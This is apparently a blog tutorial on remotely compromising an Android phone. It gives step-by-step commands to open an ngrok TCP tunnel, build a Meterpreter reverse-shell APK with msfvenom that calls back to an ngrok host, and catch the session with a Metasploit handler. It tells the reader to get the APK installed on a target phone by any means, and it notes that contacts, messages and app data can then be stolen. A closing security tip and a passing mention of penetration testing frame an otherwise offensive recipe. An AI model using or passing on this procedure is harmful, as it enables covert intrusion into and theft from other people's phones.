Hack Android Phone
This tutorial will show you how to remotely hack Android phones over the Internet.
Usually on a WAN, first, you need a static IP / hostname, and second, you need to do port forwarding to allow your traffic to pass, and we all know that both are so difficult in real life. time since we have limited access to ports on the network.
So what we are going to do in this scenario, we are going to set up a secure tunnel using Ngrok.
Ngrok is a tunneling reverse proxy system that establishes tunnels from a public endpoint, that is, from the Internet to a locally running network service.
This can help us create a public HTTP / HTTPS URL for a website running locally on our computer. We don’t need to do any port forwarding when using Ngrok and our network service will eventually be available on the Internet using TCP tunneling.
Step – 01
First, you need to install Ngrok on your Kali machine.
Launch Kali and go to Ngrok to access its official website: https://ngrok.com/
You must first create an account. Go to the registration option and fill in all the required fields.
After registration, you can download the ngrok installer for Linux.
WARNING :- Do not use your work email address or an email address that has access to your personal information. It is recommended that you use temporary emails when performing penetration testing.
Step – 02
Change to the download directory where the downloaded file is located.
You must unpack this file. Use the unzip command to extract the file.
Step – 03
After unpacking, you need to save the token that was transferred to your account.
Copy the token from here and paste it into your terminal. Make sure to paste the token into the same directory where you have ngrok.
You are ready to use this tool.
Type in terminal :-
./ngrok tcp [Port no:] (choose any port number you want to bind the connection to)
Step – 04
Type command :-
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10900 R > /root/Desktop/android.apk
Step – 05
Install the exploit as multi/handler, Lhost as localhost i.e. 0.0.0.0, Lport as 4242, and run exploit.
Step – 06
After doing all the above steps all you need to do is install the app on the targeted android phone. it does not matter how you will do it. you can use a downloadable link to download and install the apk file.
After installing and running the app from my Android phone, I got a session on my Kali attack machine.
This is how you can use your Android phone and access it remotely over the internet instead of over your local network.
After a session, you know that an attacker can easily obtain your information, steal your contacts, messages, application data, and more. Thus, it is much easier to access your phone when you are not aware.
This exploit has been tested on Android version 9.0, which is not an old version and is currently used by many users.
A helpful tip for securing your Android device is not to install any application from an unknown source, even if you really want to install it, try reading and examining its source code to see if this file is malicious or not.